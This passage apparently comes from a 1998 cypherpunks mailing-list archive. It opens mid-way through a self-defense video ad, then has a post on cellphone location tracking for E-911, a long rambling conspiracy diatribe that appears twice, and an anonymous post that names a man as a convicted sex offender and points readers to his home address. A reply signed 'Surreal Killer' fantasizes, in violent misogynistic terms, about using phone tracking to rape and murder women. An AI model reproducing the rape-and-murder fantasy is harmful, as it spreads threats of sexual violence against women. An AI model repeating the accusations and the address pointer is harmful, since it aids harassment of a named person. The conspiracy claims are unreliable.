and can be the difference between life or death if you are attacked on 
the street.
 
My video uses easy to understand terms for younger children. This video is 
a MUST for any college student (male or female). The techniques in this 
video are not only good for self defense but for building confidence when 
out in public. Senior citizens and middle age adults will gain the most 
benefit from this video. It will also give you helpful hints on how to 
carry packages and purses so they won't get taken, how to avoid looking 
like a victim, and how to use common objects as weapons to fend off 
even the most aggressive attacker. 

With so many self defense videos on the market, it is about time that 
there was one made for people who want one simple and effective so they 
can actually use the techniques within minutes of learning them. The best 
part is that you won't have to study karate for fifteen years in order
to do these techniques. Just a few short minutes and you will understand
how effective you can be. When it comes right down to it, you are your
own best judge as to whether you feel safe or not. My video will help you
to feel that you have an edge on anyone who may try to attack you.  

It's impossible to know when or where a violent crime will happen and
the last thing you want to be is the victim. This video gives you the 
chance you need to react and avoid becoming a victim. All you really
 need is " A Chance to Escape."

To order my video "A Chance to Escape" send check or money order in 
U.S. funds only for $19.95+($4.95 S/H) to:

               Escape Enterprises
               P.O. Box  1657
               Meriden, CT.  06451

         Sorry, no COD's .     Please allow 2-3 weeks for delivery.
                      
              Don't be a victim - Fight back
i




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@die.com>
Date: Fri, 17 Apr 1998 14:52:35 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Position escrow
Message-ID: <19980417175445.54922@die.com>
MIME-Version: 1.0
Content-Type: text/plain


	For those interested in the current state of position escrow
technology (AKA FCC mandated E-911 emergency call location reporting), 
the  April 1998 Issue of IEEE Communications Magazine is a special issue
devoted to the subject of locating cellphones and other personal
wireless devices that radiate rf.

	This technology, quietly ordered by the FCC, will measure the
location of a caller accurate to within 125 meters at least 67% of the
time.  And the industry seems to be moving toward DTOA and other passive
triangulation techniques rather than making cell phones simply contain a
GPS receiver. This of course means that the network will be able to
locate a cellphone whenever it radiates anything at all, rather than
asking it for its position only under certain emergency circumstances
such as an E-911 call. And all cell and PCS phones and some pagers can be
interrogated by the network and commanded to silently respond with a
registration message without user intervention or knowlage as part of
the mechanism by which the cell system locates the correct cell site to
put an incoming call for the phone on.  Thus passive tracking of the
location of  any cellphone that is turned on with 125 meter accuracy
will become a feature of most cell and PCS  networks, a feature 
presumably subject to at least some law enforcement access via the CALEA
mechanisms.

	And given that the cell and PCS systems will be capable of
such tracking, is there any reason to believe that law enforcement 
and other more shadowy groups won't find the necessary "terrorist, drug
dealer, etc" crisis to gain secret access to this capability ?

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cereal Killer <wheaties@dev.null>
Date: Fri, 17 Apr 1998 20:17:47 -0700 (PDT)
To: die@die.com
Subject: Re: Position escrow
In-Reply-To: <19980417175445.54922@die.com>
Message-ID: <35381AD3.1D10@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Dave Emery, at Die!Die!Die!@die!die!die!.cum, wrote:
> 
>         For those interested in the current state of position escrow
> technology (AKA FCC mandated E-911 emergency call location reporting),
> the  April 1998 Issue of IEEE Communications Magazine is a special issue
> devoted to the subject of locating cellphones and other personal
> wireless devices that radiate rf.
> 
>         This of course means that the network will be able to
> locate a cellphone whenever it radiates anything at all, rather than
> asking it for its position only under certain emergency circumstances
> such as an E-911 call.

Does this mean that if a woman calls me in response to an ad I place
in a 'Personals' column, that I can track her down and rape and murder
her, even though she is using a mobile cellular phone for her own
protection?
Being a violent sexual pervert with a long history of sexual predetation
I can certaily vouch for the fact that having a hard-on with no victim
in sight is an emergency, regardless of whether or not THOSE CHEAP
WHORES ARE TRYING TO HIDE BEHIND THE PHYSICAL ANONYMITY OF A CELLULAR
PHONE!!!!!!!!!!!!
Thank Dog that those in charge of monitoring the F(ucking) 
C(ock-teasing) C(unts) using cellular phones are finally providing
myself and my cellmates with a way to locate THOSE STINKING BITCHES
AND MAKING THEM *PAY* FOR THE SINS OF *ALL* THE MOTHERS WHO LEAD
THEIR CHILDREN ON AND THEN REFUSE TO PUT OUT FOR THEM!!!!!

Sincerely,
Surreal Killer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Fri, 17 Apr 1998 22:06:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199804180450.VAA20286@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Saturday, April 18, 1998 - 00:02:36 MET (MeatSpace Eternal Time)

Prologue 17/0 -- SPACE ALIENS HIDE MY DRUGS!!!

Yo PsychoPukes!

I am sending this alcoholonymously so that only those who are
connected to the ScotchServer will be able to transylvaniate
the chalice filled with the blood of my martyrdom and nibble
on the edge of the 'crackers' diagnosis of my body, in order
to Divine which porn-movie star I am currently channeling,
thus being able to monitor and properly categorize both the
level and quality of shit which I am about to spew forth in
yet another rambling diatribe on the various ways in which
my dichotomous insanities relate to crypto and privacy, and
are therefore relevant to the BikerSucks Distributors List.

Although I am capable of telling all manner of outrageous lies
under cover of my usurptation of the multi-user TruthMonger
persona, in my role as the pathetic, drunken ScotchMonger, I
am incapable of rising above any level beyond wallowing in
a self-pitying confession of moral failures and character
weaknesses which anyone with even a modicum of self-respect
would refrain from revealing to God, Himself, let alone to
God-and-Everybody.

The Dark Allies of the Oppresor (TM) have descended upon my
personage and taken a large byte out of my ass by wiping out
my WebSite and confiscating my computers, as well as those of
my guilty-bystander nephews.
As much as I would like to portray myself as a 'martyr for
the cause' of free speech and privacy, the whole affair pretty
much boils down to the fact that I am pretty much a mentally
deranged shit-disturber who would salute the flag and spend
my whole day singing 'God Save The Queen' if I was told that
it was illegal or socially unacceptable to do so.
Add to this the fact that I have long been involved in a variety
of illegal and illicit nefarious activities that I have little
capacity to understand, and I can pretty much be written off as
a sorry loser who pretty much deserves to be used as cannon
fodder in the war between those with connections to opposite
poles of the ClueServer.

In regard to the undeniable reality of being an ignorant schill
useful as a protective buffer between my Muppet Pastors and
Brogue Brothers willing Prawns, I can only say that I am proud
to have been able to offer my services as a loudmouth asshole
in the furtherance of a cause that it is beyond my intellectual
capacity to fully understand.

The Good News (TM) is that anyone reading this rambling, semi-
coherent missive can rest assured that the details of what I
am sharing have no need of embellishment, since I, myself, play
absolutely no part in my current role, being merely a sorry,
pathetic dupe of those whose mental faculties have not been
decimated by years of alcohol and drug abuse.
My career as an international recording artist and touring
musician was nothing more than a charade designed to disguise
my mental aberrations under the cover of an acceptable long-
haired country outlaw persona.
My career as 'The World's Foremost Computer Expert' was equally
a charade designed to disguise my technical and professional
incompetence under the cover of an image as an eccentric genius.

The foregoing being said, let me share with you a few things
which make me laugh until I pee my pants, drop my dime, and
mess my drawers.

Since the original release of 'The Xenix Chainsaw Massacre' in
1989, I have gathered a following of hackers, crackers, phreaks,
phracks, punks and mental cybermisfits that would provide a
lifetime of research for any psychologist whose goal was to 
study digitally-based insanity.
Recently, those who have spent years feeding me information to
be released on an "I don't have the foggiest idea what it means"
basis, went underground, for the most part, as  a result of a
variety of attacks directed toward them by those who wish to
control and manipulate each and every aspect of the Brave New
Digital World.

Nonetheless, today I got a syruptacious message from the grand
personage known only as the Evil-1, informing me that, although
the Usual Suspects involved in taking control of my InterNet
accounts have faded into the background, due to a sharp rise in
the monitoring of my account, unknown player/warriors have come
out of nowhere to throw a serious fuck into the ISP which so
high-handedly murdered my WebSite, without a single word of
explaination to myself or anyone else.
The Evil-1, sending me a private email (using the
SysAdmin account at the Well), informed me that some kind soul
has turned the programs used to surrupticiously monitor my 
email communications into global programs which perform the
same tasks on the account of each and every customer of my
ISP, thus tying their tubes in a knot that  cannot be undone
by anyone they have on staff, or by the professional computer
spooks that have been imported to build a coherent conspiracy
out of my mad ramblings.

As well, a dear lady friend (who has been instumental in making
the dev.null server a living reality for the better part of a
decade) informs me that a variety of hackers and crackers who
are only peripherally connected to the HyperPukes Distraught
Baleing-Twine List, seem to be involved in accessing my ISP's
computers to perform mysterious tasks that have purposes that
even she cannot divine, with the enormous amount of tools and
resources at her fingertips.
To quote her directly, "The esteemed Lost Alamo Boys and Girls
4-H(orsemen) Club is unanimous in their opinion that the highly
professional and superbly trained guerilla units of the Magic
Circle are in no way superior to the unknown entities currently
crawling out of disparate locations of the cyberwoodwork to
lend a confusing hand to a common goal which is shared by none
and championed by all."

In short, it seems be the general consensus among those who have
spent years dogging my CyberTrail as a result of my use as an
expendable schill suitable to act as a front-man/target for the
dissemination of innocuously dangerous manuscripts, that the
'creme de la creme' of ZOG's MeatSpace CyberGestapo is sucking
hind-tit to an untraceable, unorganized, Cult of One/Army of Dog
pseudo-phenomena that is very likely composed mostly of Doodze
and Doodzettes who spend more on Clearasil than the NSA and DOD
spend on computer security, combined.

Lest you, as a CypherPinko, think you can get away with dismissing
the preceding as the mad ramblings of a psychotic, drunken, mental
case under the influence of bizarre combinations of legal and 
illegal drugs (which is, actually, the case), stop and think about
the things that you, yourself, have done over the course of your 
career as a part-time miscreant, during which you have performed 
inexplicable feats of derring-do which were far beyond your 
capacity, given your technological expertise and experience, but 
which were brought to successful fruitation by virtue of the 
clarity of purpose and the strength of committment that you 
brought to the activity.
If you have made a habit of selling yourself short for your seeming
accomplishments because you convinced yourself that you, and your
accomplishments, are 'ordinary', then you need to review your life,
your actions, and your accomplishments, while keeping a Taoist eye
open, and a Taoist ear cocked, for the subtle signs of a Magic at
work which goes beyond Mathematics and steps into the arena where
Conscious Will defines the paridigms within which Reality is 
manifest according to the dictates of Dreams and Desire.

Despite my obvious dysfunctionality in a world which demands a strict
adherence to the Norm (TM), I reign supreme as a Prophet and Conspiracy
Theorist Extraordinaire.
"We make our Gods, and do battle with them...and they bless us."
~ Herman Hesse ~

Anyone who honestly researches the wildest of the claims made in
the 'True Story Of The InterNet' manuscripts will be able to prove
for themselves the reality of even the most preposterous of the
wild and weird pronouncements of collusion between a far-reaching
network of Circle of Eunuchs conspirators.
Those who check the details surrounding the warnings to Jim Bell
shortly before his persecution, the arrival of the son of gomez
on the doorstep of his mentor mere hours before gomez was cut
loose from a company he had founded a decade and a half earlier,
the synchonicitous messages from the L.M. Boyd sampler and the
A.Word.A.Day bulk emails mirroring releases of the 'True Story'
manuscripts, the coincidences of timing between major events in
the story of the Unabomber and the activities of the Author, ad
infinitum...
Those who diligently and honestly check the MeatSpace details
surrounding the space-time continuum of these events will be
left with no doubt that the true, discernable facts surrounding
the events are perfectly consistent with the claims of the
'True Story' manuscripts that there is an underground movement
in the computer industry which supports, confirms and enhances
the work of separate guerilla cells working independently, yet
within a concrete and discernable paradigm encompassing a 
common goal.

The Truth, The Whole Truth, And Nothing BUT The Truth:
[Note from the Otter: I have every reason to believe that
 I am currently 'marked for deletion' from the List (TM)
 of those whom the DickMongers can't be bothered butt-
 fucking just yet, so anyone who dares to suggest, in the
 remotest corner of their mind, that I have anything to
 be gained by embellishing or distorting the Truth in 
 regard to my most dearly held beliefs, based on my life
 experiences...can go fuck themselves.
 OTOH, anyone who wishes to discount what I am about to
 say on the basis that I am a drunken, psychotic drug-
 addict with a slim hold on Reality (TM) probably has
 a case that would hold up when pleaded before a jury
 of Phillip Hallam-Baker's peers.]

All of the wild and preposterous claims made in the
'True Story of the InterNet' manuscripts, in regard to 
the verifiable trails of intrigue connecting the Author
with the pesonages and events of a wide variety of 
deeply meaningful events in the battles between the
Forces of Light and the Forces of Darkness taking place
on the battlegrounds in Waco, Ruby Ridge, San Diego,
Sacramento, etc., etc., are Total HorseShit (TM) in
the world of MeatSpace, and Totally True (TM) in the
world of Reality (TM).
You see, Reality (TM) is nothing more nor less than 
the fulfillment of the totality of our individual 
thoughts, beliefs, hopes, dreams and actions. And the
Spheres of Reality encompass physical and virtual 
territories ranging from the MeatSpace and MindSpace
bounded by an individual Cult of One persona, to the
time-space continuum bounded by Infinity and Eternity.

In short, when the Author's missives are supported 
and confirmed by a web of totally unrelated facts and 
circumstances which consistently mirror the wild and
outlandish claims being made, it is because when any
living entity in the universe takes a step in a self-
willed direction, the underlying fabric of the Tao
changes shape to bring itself into alignment with the
consciously willed goal of that entity.

The True Battle (TM) taking place within the confines
of MeatSpace Reality is the battle of conscious, self-
willed individuals writing Reality Scripts capable of
balancing and/or overcoming the Generic Reality being
written by the more numerous Sheeple following the 
Scripts written by their Masters.
Women and men who consciously contribute to the daily
construction of Universal Reality influence the basic
structure of the Universe to a greater degree than 
a greater number of Sheeple who are heading in a 
different direction, but who scatter back and forth,
being kept only intermittently on course by the dogs
which nip at their heels.

"Let us each choose a Vision,
 Let us each choose a Dream.
 Let us each write a Chapter of Life,
 On our own Silver Screen."
~ 'You Can't Kill A Dream, Or A Dreamer', C.J. Parker

Anyone who wishes to join Tim May in dismissing the 
preceding as an example of laughable 'Magical Thinking"
having forgetten that Mr. May is simply a senile old 
fart who can't even find his shoes, is free to do so.
However, no amount of skepticism and derision will 
change the fact that the sincerely professed insanity
contained in the 'True Story' manuscripts lead to an
incontrivertable confirmation of their validity within
the confines of the MeatSpace time-space continuum 
running parallel to their release.

Anyone who wishes to avoid facing the reality of what
is being suggested in this rambling missive by a 
mentally unstable, alcoholic, drug-addicted terrorist
pedophile, in order to preserve the sanity that can
be maintained by dismissing the Truth when it leaks
from the lips of the deranged and depraved, should 
avoid reading the chapters of 'Space Aliens Hide My
Drugs' which lightly tread the boundaries of 
Biosemiotics.
Unfortunately, mathematics, biology, physics and 
psychology are rapidly converging around a model of
the universe which suggests that each and every 
entity capable of receiving, emitting, categorizing
and acting on information data and processes ranging
from the inherent structure of DNA to convoluted
discourses on Quantum Physics, is not just a 
'product' of its universal environment, but also an 
active 'creator' of that universal environment.

In short, though you may easily dismiss my wild 
claims that the ramblings of a mad Author are actively
creating the universe which you inhabit, it is highly
unlikely that you will be able to avoid the semi-
sensible posts of Jim Choate to the list concerning
those who are defining the new frontiers of science
with provable theories every bit as nonsensical as
those of Einstien, or be able to ignore the highly
organized trails of hard facts and figures provided
by John Young's website, confirming the bizarre 
reality of the Author's neurological nightmares and 
Choate's cutting-edge scientific dreams being brought
to fruitation and manifested in the established 
MeatSpace chronicles which Dr. Young provides for
the edification of unbelievers, during the functional
periods of lucidity he experiences in between his
mad rampages into the depths of drug-induced insanity.

In effect, those who fail to understand the true import
of the Biosemiotic basis of the conjoined evolution of
mind and matter are doomed to exit this life still
believing that they were predestined to become a 
side-pocket combination shot of Universal Fats, the
prime mover of all that exists, instead of realizing
that, at any point in time, they were free to change
the nature and direction of the Game (TM) by declaring,
"Damn the CueBall, full speed ahead!"

Uuhhh...I need a drink...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 17 Apr 1998 15:36:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NoneRe: Gary Lee Burnore, Registered Sex Offender in Raleigh, NC
In-Reply-To: <gburnoreEr8085.po@netcom.com>
Message-ID: <199804172236.AAA05606@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Gary Lee Burnore <gburnore@databasix.com> wrote:

> The anonymous asshole wrote:
> absolutly nothing of value.

But Gary Lee Burnore, the convicted pedophile, saw fit to comment anyway,
refuting his own claim.

> WHen are you going to learn that your lies won't work.  When will you
> admit what's really bothering you.  You're the dumbest form of terrorist
> there is.  What are your demands?  Betcha don'te even have any.  Your
> obsession with me shows with every post.  Shall I shit in a bucket and
> leave it outside for you to smell?  

No one is forcing you to reply if you think a post contain "nothing of
value".

Gee, Gary, it was the state of North Carolina that PUBLISHED your arrest
record for "indecent liberties with a minor" on its PUBLIC website.  Maybe
you ought to ask them for their "demands".  All I did was respond to a
NON-ANONYMOUS query by a hotmail.com user asking if the Gary Lee Burnore
that was ALREADY PUBLISHED on the NC website was you.

Only because you and your sock puppets chose to publicly comment is this
thread even continuing.  And consider the fact that most of the details,
such as the fact that the victim was a 17 year old female, and that you
were sleeping on the couch at her mother's home, came in a NON-ANONYMOUS
post from Camille Klein, who allegedly obtained this information from YOU.

I only GUESSED that the victim was the same one whose mother had earlier
been privately tipped off about you.  Even my knowledge that a whistle
blower was involved came from one of YOUR public posts.  Unless you've been
an overnight guest in the homes of several women in Santa Clara, each with
17 year old daughters, then you've provided more details than all the
anonymous posters put together have or even could have.

In your haste to make unproven accusations over a year ago against someone
who had public challenged you, you chose to post information that would
have otherwise been unavailable to the general public that would later
implicate you.

> A challenge to you anon asshole.  Prove what you say or shut the fuck up.
> Get the records from the Santa Clara County court.  PROVE who the victim
> is and what happened.  Prove you know who the mother of the victim is.
> Prove that I did what you claimed or shut the fuck up.

Make up your mind, Gary.  Have you molested more than one minor, giving you
doubts that I'm referring to the right one (since I've never named anyone)?
Why else would you ask me to prove that I know who the victim really is in
one paragraph, then complain that I'm "dragging the victim through the mud"
in the next?  How could I do the latter if I didn't really know who she
was?  If you're going to lie, you need to be a bit more consistent.

And, BTW, where did I claim that I knew the identities of either the victim
or of her mother?  All I've said is that the person who tipped them off
obviously did know that.  I wouldn't have even known that unless you'd
complained about it publicly.  You are the one that volunteered the
information that the victim had a web page at DataBasix, so if the victim
was identified in any way, it was by you.  Of all the 17 year old girls in
Santa Clara, saying that she had a web page at DataBasix sure narrows it
down, doesn't it?

And wouldn't it be a strange coincidence that you'd been accused of
molesting one teenage girl, allegedly falsely, and then you're later
convicted of molesting a totally different teenage girl of the same age,
living in the same city, and that you'd been an overnight guest in both
homes?  I do believe it was you who remarked a year ago that "there are too
many coincidences".

> The only things you've proven are that you'll go to any length to follow
> me and that you'll lie to try.  You've also proven that it's not about
> law, it's not about the victim (because you keep trying to drag the victim
> and her family through the mud to get to me), it's about you.  You were
> obviously embarassed by my posting of RFG's tax lein. Why? Are you he? Are
> you a relative?  Are you a business associate?   

No, but why let the facts spoil a perfectly good Burnorian fantasy?  You've
had a history of taking whoever pissed you off the most recently and
accusing him of all sorts of unproveable things.  Back when someone tipped
off the victim's mother via PRIVATE e-mail, YOU stated PUBLICLY that it was
"Ronald Francis".  That was the first public indication that there even was
a victim that you had molested!  You just unwittingly confirmed it by
complaining about the whistle blower in a public post.  The NC website is
just further confirmation, as is your own admission that the victim was a
17 year old female.

If you've got a beef against RFG, why not take it up with him?  You've got
his e-mail and snail mail addresses.  Why is it that you accuse others of
doing the very things that you do yourself?

If you really think that I'm "RFG", why did you post this publicly and not
e-mail it directly to him (allegedly me)?  Another hole in your paranoid
theory?

> It's clear by all you say
> that you're one of those.  You're also a coward.   You are afraid of the
> law because you know you've lied.  You're afraid of me because you won't
> meet me face to face.  

Anyone wishing to meet a convicted sex offender face to face is welcome to.
I'll decline your gracious invitation, thanks.  Anyone desiring to do so
can find your home address on the NC website.

> You're afraid of the truth because you hide behind
> a remailer and have NEVER ONCE posted ANY _E_V_E_D_I_N_C_E_ of your
> claims.
>
> Fortunately, after you posted the address and phone number of someone to
> the sex-marketplace groups you lost credibility.  Now you've lost even
> more.  You've actually lost it all. NO ONE of any value believes you. 
> Your lies are useless now because you've spouted for so long with no
> EVIDENCE. 

Your proof of who allegedly posted this information, a charge that you've
NEVER been able to document, is what?  If, as Belinda Bryan claimed, someone
obtained the names and addresses of *EVERY* client and employee of DataBasix
to usenet (which has never been proven), who do you suppose would be in a
position to obtain such information?

It looks like more dirty tricks by the DataBasix wrecking crew are in the
works, huh?  Anything to intimidate anyone who gets a little too close to
the truth about your activities.

> You're a useless piece of shit. You're a coward.  A raving fucking coward.
> So continue to post your bullshit.  It's become a joke that no one laughs
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> at.  You're like the guy at the party with the lampshade on his head only
> everyone is laughing at you instead of with you.

How gracious of you, Gary.  Feel free to post your inane denials, too.

The drunk guy at the party with the lampshade will sober up.  A convicted
pervert and molester who preys un underage girls is a different story.  I
suspect that most parents would prefer to have "Mr.  Lamshade" in their
neighborhood to Fester the Molester.

> They don't call you the anonymous asshole for nothing.

"They"?  You and your sock puppets?  The truth hurts, doesn't it, Gary?

If you're going to whine that anonymous people are "assholes" just because
they'd prefer not to let a CONVICTED SEX OFFENDER know their identity and be
able to track down their home address where their children live, then you're
entitled to that self-serving opinion.

You're still pissed that someone anonymously tipped off your victim's
mother and high school principal, aren't you?  That's what started your
paranoid little vendetta against anonymous posters and remailers.

It's you that's making the accusations.  If you're saying someone is lying,
then prove it.  The people who have posted information have posted the URLs
from unbiased, third-party sites, including those of the state of North
Carolina.  The only rebuttal has been your own unsubstantiated claims.

Either the URL that has been posted as a reference is accurate, or else
this mythical "anon asshole" you've been whining about for nearly two years
has somehow infiltrated the San Francisco and Santa Clara police
departments, the victim and her mother, as well as the state of North
Carolina's registered sex offender website, created bogus arrest records,
forged a sex offender registration form, and surreptitiously taken the
mugshot just to make poor, innnocent Gary Lee Burnore look bad.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 17 Apr 1998 19:56:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dead Men Don't Wear Dentures! / Prologue 17/0 - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <199804180256.EAA16037@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Saturday, April 18, 1998 - 00:02:36 MET (MeatSpace Eternal Time)

Prologue 17/0 -- SPACE ALIENS HIDE MY DRUGS!!!

Yo PsychoPukes!

I am sending this alcoholonymously so that only those who are
connected to the ScotchServer will be able to transylvaniate
the chalice filled with the blood of my martyrdom and nibble
on the edge of the 'crackers' diagnosis of my body, in order
to Divine which porn-movie star I am currently channeling,
thus being able to monitor and properly categorize both the
level and quality of shit which I am about to spew forth in
yet another rambling diatribe on the various ways in which
my dichotomous insanities relate to crypto and privacy, and
are therefore relevant to the BikerSucks Distributors List.

Although I am capable of telling all manner of outrageous lies
under cover of my usurptation of the multi-user TruthMonger
persona, in my role as the pathetic, drunken ScotchMonger, I
am incapable of rising above any level beyond wallowing in
a self-pitying confession of moral failures and character
weaknesses which anyone with even a modicum of self-respect
would refrain from revealing to God, Himself, let alone to
God-and-Everybody.

The Dark Allies of the Oppresor (TM) have descended upon my
personage and taken a large byte out of my ass by wiping out
my WebSite and confiscating my computers, as well as those of
my guilty-bystander nephews.
As much as I would like to portray myself as a 'martyr for
the cause' of free speech and privacy, the whole affair pretty
much boils down to the fact that I am pretty much a mentally
deranged shit-disturber who would salute the flag and spend
my whole day singing 'God Save The Queen' if I was told that
it was illegal or socially unacceptable to do so.
Add to this the fact that I have long been involved in a variety
of illegal and illicit nefarious activities that I have little
capacity to understand, and I can pretty much be written off as
a sorry loser who pretty much deserves to be used as cannon
fodder in the war between those with connections to opposite
poles of the ClueServer.

In regard to the undeniable reality of being an ignorant schill
useful as a protective buffer between my Muppet Pastors and
Brogue Brothers willing Prawns, I can only say that I am proud
to have been able to offer my services as a loudmouth asshole
in the furtherance of a cause that it is beyond my intellectual
capacity to fully understand.

The Good News (TM) is that anyone reading this rambling, semi-
coherent missive can rest assured that the details of what I
am sharing have no need of embellishment, since I, myself, play
absolutely no part in my current role, being merely a sorry,
pathetic dupe of those whose mental faculties have not been
decimated by years of alcohol and drug abuse.
My career as an international recording artist and touring
musician was nothing more than a charade designed to disguise
my mental aberrations under the cover of an acceptable long-
haired country outlaw persona.
My career as 'The World's Foremost Computer Expert' was equally
a charade designed to disguise my technical and professional
incompetence under the cover of an image as an eccentric genius.

The foregoing being said, let me share with you a few things
which make me laugh until I pee my pants, drop my dime, and
mess my drawers.

Since the original release of 'The Xenix Chainsaw Massacre' in
1989, I have gathered a following of hackers, crackers, phreaks,
phracks, punks and mental cybermisfits that would provide a
lifetime of research for any psychologist whose goal was to 
study digitally-based insanity.
Recently, those who have spent years feeding me information to
be released on an "I don't have the foggiest idea what it means"
basis, went underground, for the most part, as  a result of a
variety of attacks directed toward them by those who wish to
control and manipulate each and every aspect of the Brave New
Digital World.

Nonetheless, today I got a syruptacious message from the grand
personage known only as the Evil-1, informing me that, although
the Usual Suspects involved in taking control of my InterNet
accounts have faded into the background, due to a sharp rise in
the monitoring of my account, unknown player/warriors have come
out of nowhere to throw a serious fuck into the ISP which so
high-handedly murdered my WebSite, without a single word of
explaination to myself or anyone else.
The Evil-1, sending me a private email (using the
SysAdmin account at the Well), informed me that some kind soul
has turned the programs used to surrupticiously monitor my 
email communications into global programs which perform the
same tasks on the account of each and every customer of my
ISP, thus tying their tubes in a knot that  cannot be undone
by anyone they have on staff, or by the professional computer
spooks that have been imported to build a coherent conspiracy
out of my mad ramblings.

As well, a dear lady friend (who has been instumental in making
the dev.null server a living reality for the better part of a
decade) informs me that a variety of hackers and crackers who
are only peripherally connected to the HyperPukes Distraught
Baleing-Twine List, seem to be involved in accessing my ISP's
computers to perform mysterious tasks that have purposes that
even she cannot divine, with the enormous amount of tools and
resources at her fingertips.
To quote her directly, "The esteemed Lost Alamo Boys and Girls
4-H(orsemen) Club is unanimous in their opinion that the highly
professional and superbly trained guerilla units of the Magic
Circle are in no way superior to the unknown entities currently
crawling out of disparate locations of the cyberwoodwork to
lend a confusing hand to a common goal which is shared by none
and championed by all."

In short, it seems be the general consensus among those who have
spent years dogging my CyberTrail as a result of my use as an
expendable schill suitable to act as a front-man/target for the
dissemination of innocuously dangerous manuscripts, that the
'creme de la creme' of ZOG's MeatSpace CyberGestapo is sucking
hind-tit to an untraceable, unorganized, Cult of One/Army of Dog
pseudo-phenomena that is very likely composed mostly of Doodze
and Doodzettes who spend more on Clearasil than the NSA and DOD
spend on computer security, combined.

Lest you, as a CypherPinko, think you can get away with dismissing
the preceding as the mad ramblings of a psychotic, drunken, mental
case under the influence of bizarre combinations of legal and 
illegal drugs (which is, actually, the case), stop and think about
the things that you, yourself, have done over the course of your 
career as a part-time miscreant, during which you have performed 
inexplicable feats of derring-do which were far beyond your 
capacity, given your technological expertise and experience, but 
which were brought to successful fruitation by virtue of the 
clarity of purpose and the strength of committment that you 
brought to the activity.
If you have made a habit of selling yourself short for your seeming
accomplishments because you convinced yourself that you, and your
accomplishments, are 'ordinary', then you need to review your life,
your actions, and your accomplishments, while keeping a Taoist eye
open, and a Taoist ear cocked, for the subtle signs of a Magic at
work which goes beyond Mathematics and steps into the arena where
Conscious Will defines the paridigms within which Reality is 
manifest according to the dictates of Dreams and Desire.

Despite my obvious dysfunctionality in a world which demands a strict
adherence to the Norm (TM), I reign supreme as a Prophet and Conspiracy
Theorist Extraordinaire.
"We make our Gods, and do battle with them...and they bless us."
~ Herman Hesse ~

Anyone who honestly researches the wildest of the claims made in
the 'True Story Of The InterNet' manuscripts will be able to prove
for themselves the reality of even the most preposterous of the
wild and weird pronouncements of collusion between a far-reaching
network of Circle of Eunuchs conspirators.
Those who check the details surrounding the warnings to Jim Bell
shortly before his persecution, the arrival of the son of gomez
on the doorstep of his mentor mere hours before gomez was cut
loose from a company he had founded a decade and a half earlier,
the synchonicitous messages from the L.M. Boyd sampler and the
A.Word.A.Day bulk emails mirroring releases of the 'True Story'
manuscripts, the coincidences of timing between major events in
the story of the Unabomber and the activities of the Author, ad
infinitum...
Those who diligently and honestly check the MeatSpace details
surrounding the space-time continuum of these events will be
left with no doubt that the true, discernable facts surrounding
the events are perfectly consistent with the claims of the
'True Story' manuscripts that there is an underground movement
in the computer industry which supports, confirms and enhances
the work of separate guerilla cells working independently, yet
within a concrete and discernable paradigm encompassing a 
common goal.

The Truth, The Whole Truth, And Nothing BUT The Truth:
[Note from the Otter: I have every reason to believe that
 I am currently 'marked for deletion' from the List (TM)
 of those whom the DickMongers can't be bothered butt-
 fucking just yet, so anyone who dares to suggest, in the
 remotest corner of their mind, that I have anything to
 be gained by embellishing or distorting the Truth in 
 regard to my most dearly held beliefs, based on my life
 experiences...can go fuck themselves.
 OTOH, anyone who wishes to discount what I am about to
 say on the basis that I am a drunken, psychotic drug-
 addict with a slim hold on Reality (TM) probably has
 a case that would hold up when pleaded before a jury
 of Phillip Hallam-Baker's peers.]

All of the wild and preposterous claims made in the
'True Story of the InterNet' manuscripts, in regard to 
the verifiable trails of intrigue connecting the Author
with the pesonages and events of a wide variety of 
deeply meaningful events in the battles between the
Forces of Light and the Forces of Darkness taking place
on the battlegrounds in Waco, Ruby Ridge, San Diego,
Sacramento, etc., etc., are Total HorseShit (TM) in
the world of MeatSpace, and Totally True (TM) in the
world of Reality (TM).
You see, Reality (TM) is nothing more nor less than 
the fulfillment of the totality of our individual 
thoughts, beliefs, hopes, dreams and actions. And the
Spheres of Reality encompass physical and virtual 
territories ranging from the MeatSpace and MindSpace
bounded by an individual Cult of One persona, to the
time-space continuum bounded by Infinity and Eternity.

In short, when the Author's missives are supported 
and confirmed by a web of totally unrelated facts and 
circumstances which consistently mirror the wild and
outlandish claims being made, it is because when any
living entity in the universe takes a step in a self-
willed direction, the underlying fabric of the Tao
changes shape to bring itself into alignment with the
consciously willed goal of that entity.

The True Battle (TM) taking place within the confines
of MeatSpace Reality is the battle of conscious, self-
willed individuals writing Reality Scripts capable of
balancing and/or overcoming the Generic Reality being
written by the more numerous Sheeple following the 
Scripts written by their Masters.
Women and men who consciously contribute to the daily
construction of Universal Reality influence the basic
structure of the Universe to a greater degree than 
a greater number of Sheeple who are heading in a 
different direction, but who scatter back and forth,
being kept only intermittently on course by the dogs
which nip at their heels.

"Let us each choose a Vision,
 Let us each choose a Dream.
 Let us each write a Chapter of Life,
 On our own Silver Screen."
~ 'You Can't Kill A Dream, Or A Dreamer', C.J. Parker

Anyone who wishes to join Tim May in dismissing the 
preceding as an example of laughable 'Magical Thinking"
having forgetten that Mr. May is simply a senile old 
fart who can't even find his shoes, is free to do so.
However, no amount of skepticism and derision will 
